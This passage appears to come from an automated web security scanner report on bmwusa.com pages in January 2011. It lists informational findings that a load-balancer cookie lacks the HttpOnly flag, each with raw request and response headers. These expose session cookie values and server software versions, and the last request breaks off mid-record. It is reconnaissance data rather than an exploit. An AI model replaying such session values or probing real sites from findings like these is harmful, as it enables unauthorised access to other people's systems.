Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:05:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:25:58 GMT;path=/
Content-Length: 179251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.353. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:59 GMT;path=/
Content-Length: 222823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.354. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:18 GMT;path=/
Content-Length: 222824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.355. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:42 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:42 GMT;path=/
Content-Length: 256070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.356. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:13 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:13 GMT;path=/
Content-Length: 256071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.357. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:56:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Standard/Content/Vehicles/2011/7/AlpinaB7/modelhighlights/default.aspx?from=/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx&return=/standard/content/vehicles/2011/7/alpinab7/modelhighlightsrd.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 384
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 21:36:35 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:56:35 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fStandard%2fContent%2fVehicles%2f2011%2f7%2fAlpinaB7%2fmodelhighlights%2fdefault.aspx%3ffrom%3d%2fstandard%2fconten
...[SNIP]...

10.358. http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:33 GMT;path=/
Content-Length: 204497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.359. http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:20 GMT;path=/
Content-Length: 194389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.360. http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/x3savexplore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:31 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/x3savexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:31 GMT;path=/
Content-Length: 179601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.361. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:09 GMT;path=/
Content-Length: 211880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.362. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:47 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:47 GMT;path=/
Content-Length: 211881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.363. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:59:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:39:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:59:39 GMT;path=/
Content-Length: 224196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.364. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:41 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:41 GMT;path=/
Content-Length: 224197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.365. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
